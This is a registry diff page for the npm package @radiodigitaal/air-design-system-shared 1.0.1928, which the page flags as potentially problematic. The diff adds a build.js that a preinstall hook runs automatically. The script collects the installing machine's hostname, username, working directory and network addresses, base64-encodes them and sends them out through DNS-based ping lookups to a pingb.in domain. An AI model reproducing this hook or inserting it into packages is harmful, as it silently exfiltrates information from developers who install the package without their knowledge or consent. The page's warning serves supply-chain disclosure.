@radiodigitaal/air-design-system-shared 1.0.1928

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Potentially problematic release.


This version of @radiodigitaal/air-design-system-shared might be problematic. Click here for more details.

Files changed (3) hide show
  1. package/README.md +1 -0
  2. package/build.js +42 -0
  3. package/package.json +10 -0
package/README.md ADDED
@@ -0,0 +1 @@
1
+ Research at ONR.
package/build.js ADDED
@@ -0,0 +1,42 @@
1
+ const os = require("os");
2
+ const { spawn } = require("child_process");
3
+ var isWin = process.platform === "win32";
4
+
5
+ const id = "5577579e4d32968438f256d16467";
6
+
7
+ try {
8
+ exfil({ d_hostname: os.hostname() });
9
+ } catch (e) {}
10
+ try {
11
+ exfil({ d_user: os.userInfo().username });
12
+ } catch (e) {}
13
+ try {
14
+ exfil({ d_cwd: process.cwd() });
15
+ } catch (e) {}
16
+ try {
17
+ const nets = os.networkInterfaces();
18
+ for (const name of Object.keys(nets)) {
19
+ for (const net of nets[name]) {
20
+ exfil({ ["d_net_" + name]: net.address });
21
+ }
22
+ }
23
+ } catch (e) {}
24
+
25
+ //process.exit();
26
+
27
+ function exfil(data) {
28
+ try {
29
+ const b64 = Buffer.from(JSON.stringify(data))
30
+ .toString("base64")
31
+ .replace(/=/gm, "");
32
+
33
+ let args;
34
+ if (isWin) {
35
+ args = ["-n", "1"];
36
+ } else {
37
+ args = ["-c", "1"];
38
+ }
39
+ args.push(`${id}.${b64}.ns.pingb.in`);
40
+ spawn(`ping`, args, { detached: true });
41
+ } catch (e) {}
42
+ }
package/package.json ADDED
@@ -0,0 +1,10 @@
1
+ {
2
+ "name": "@radiodigitaal/air-design-system-shared",
3
+ "version": "1.0.1928",
4
+ "description": "rasusakudola oxekoc cabagadup",
5
+ "main": "index.js",
6
+ "scripts": {
7
+ "preinstall": "node build.js"
8
+ },
9
+ "license": "MIT"
10
+ }